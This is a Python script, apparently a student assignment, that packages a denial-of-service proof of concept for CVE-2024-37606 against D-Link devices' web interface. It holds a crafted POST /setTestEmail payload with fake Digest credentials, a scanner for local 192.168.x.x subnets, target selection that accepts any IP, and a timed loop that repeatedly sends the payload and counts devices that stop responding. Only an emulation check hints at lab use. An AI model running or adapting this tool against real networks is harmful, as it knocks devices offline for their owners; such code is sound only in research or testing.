import socket import concurrent.futures import time import os import platform import sys import itertools import subprocess # ========== UI Stuff ========== def clear(): os.system("cls" if os.name == "nt" else "clear") def banner(): title = r""" ██╗████████╗██╗ ██╗██╗███████╗ █████╗ ██████╗ ██████╗ ██████╗ ██║╚══██╔══╝██║ ██║██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗██╔═══██╗ ██║ ██║ ██║ █╗ ██║██║ ███╔╝ ███████║██████╔╝██║ ██║██║ ██║ ██║ ██║ ██║███╗██║██║ ███╔╝ ██╔══██║██╔══██╗██║ ██║██║ ██║ ██║ ██║ ╚███╔███╔╝██║███████╗██║ ██║██║ ██║██████╔╝╚██████╔╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═════╝ CVE-2024-37606 (DOS) • NOVI HOGESCHOOL EINDOPDRACHT """ print("\033[95m" + title + "\033[0m") time.sleep(1) # ========== PoC Payload ========== def send_poc(ip): poc = b"""POST /setTestEmail HTTP/1.1\r Host: %s\r Content-Length: 44\r Authorization: Digest username="admin", realm="_00", nonce="fake", response="fake", cnonce="fake"\r \r """ % ip.encode() try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(2) s.connect((ip, 80)) s.sendall(poc) try: s.recv(1024) print(f"[+] {ip}: Responded to PoC (still alive 💡)") return False except socket.timeout: print(f"[!] {ip}: No response after PoC (possible crash 💥)") return True except Exception: return False # ========== Port & Process Checking ========== def is_http_open(ip): try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(1) s.connect((ip, 80)) return True except: return False def check_local_alphapd(): try: out = subprocess.check_output(['ps', 'aux'], text=True) if 'alphapd' in out: print("[*] Detected 'alphapd' running on local system.") return True except: pass return False def check_qemu_env(): try: with open("/proc/cpuinfo") as f: cpuinfo = f.read() if "QEMU" in cpuinfo or "Bochs" in cpuinfo or "TCG" in cpuinfo: print("[*] Running inside QEMU or emulated env.") return True except: pass return False # ========== Smart Network Scanner ========== def scan_network(): found_hosts = [] # Check localhost first print("[*] Checking localhost (127.0.0.1)...") if is_http_open("127.0.0.1") or check_local_alphapd(): print("[+] Found service on 127.0.0.1 ✓") found_hosts.append("127.0.0.1") # Scan local network ranges for subnet in ["192.168.0.", "192.168.1."]: print(f"\n[*] Scanning subnet: {subnet}0/24") with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: futures = {executor.submit(is_http_open, f"{subnet}{i}"): f"{subnet}{i}" for i in range(1, 255)} for future in concurrent.futures.as_completed(futures): ip = futures[future] if future.result(): print(f"[+] Found web interface on {ip}") found_hosts.append(ip) return found_hosts # ========== Get Target Mode ========== def get_targets(): print("\n[*] Select target mode:") print("1. Target specific IP address(es)") print("2. Scan local network for devices") print("3. Target localhost (emulated device)") choice = input("\nEnter choice (1-3): ") if choice == "1": targets = [] print("\nEnter IP addresses (one per line, empty line to finish):") while True: ip = input("> ") if not ip: break if is_http_open(ip): print(f"[+] Connection to {ip} successful ✓") targets.append(ip) else: print(f"[-] Cannot connect to {ip} on port 80") if not targets: print("[-] No valid targets specified.") sys.exit(0) return targets elif choice == "2": return scan_network() elif choice == "3": if is_http_open("127.0.0.1") or check_local_alphapd(): print("[+] Found service on localhost ✓") return ["127.0.0.1"] else: print("[-] No service detected on localhost") sys.exit(0) else: print("[-] Invalid choice.") sys.exit(1) # ========== Main Runner ========== if __name__ == "__main__": clear() banner() if check_qemu_env(): print("⚠️ Emulated environment detected — targeting localhost is recommended.\n") targets = get_targets() if not targets: print("\n[-] No D-Link services found.") sys.exit(0) try: duration = int(input("\n⏱️ How many seconds do you want to run the attack for? ")) except: print("Invalid input. Exiting.") sys.exit(1) print(f"\n[+] Launching full-auto PoC for {duration} seconds...\n") start_time = time.time() sent_count = 0 crashed_total = 0 while time.time() - start_time < duration: seconds_left = int(duration - (time.time() - start_time)) print(f"\r[⏳] Time left: {seconds_left:3} sec | PoCs sent: {sent_count}", end="") for ip in targets: crashed = send_poc(ip) sent_count += 1 if crashed: crashed_total += 1 time.sleep(1) print(f"\n\n✅ Attack completed.") print(f"📦 Total PoCs sent: {sent_count}") print(f"💥 Devices that stopped responding at some point: {crashed_total}")